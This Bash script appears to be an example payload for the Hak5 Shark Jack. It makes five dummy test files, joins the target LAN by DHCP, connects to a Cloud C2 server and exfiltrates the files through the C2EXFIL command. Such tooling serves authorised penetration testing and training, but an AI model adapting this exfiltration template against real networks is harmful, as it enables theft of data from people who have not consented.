39 lines
1.0 KiB
Bash
39 lines
1.0 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Example Cloud C2 Multi-File Exfiltration Payload
|
|
# Author: Hak5Darren
|
|
# Version: 1.0
|
|
# Requirements: Firmware v1.1.0+, Cloud C2
|
|
#
|
|
# Description: This example payload demonstrates how to use C2EXFIL to
|
|
# exfiltrate multiple files to Cloud C2. Requires a Cloud C2 server
|
|
# setup and running (download from https://c2.hak5.org) and this
|
|
# Shark Jack to be provisioned (guide from https://docs.hak5.org)
|
|
|
|
LOOT_DIR=/root/loot/c2_exfil_example
|
|
LED SETUP
|
|
|
|
# Make 5 test loot files
|
|
mkdir -p $LOOT_DIR
|
|
for n in {1..5}; do dd if=/dev/zero of="$LOOT_DIR/file$n.txt" bs=1 count=1024; done
|
|
|
|
# Get an IP address on the target LAN
|
|
NETMODE DHCP_CLIENT
|
|
|
|
# Wait until the Shark Jack has an IP address
|
|
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
|
|
|
|
LED ATTACK
|
|
|
|
# Connect to Cloud C2
|
|
C2CONNECT
|
|
|
|
# Wait until Cloud C2 connection is established
|
|
while ! pgrep cc-client; do sleep 1; done
|
|
|
|
# Exfiltrate all test loot files
|
|
FILES="$LOOT_DIR/*.txt"
|
|
for f in $FILES; do C2EXFIL STRING $f Example; done
|
|
|
|
LED FINISH
|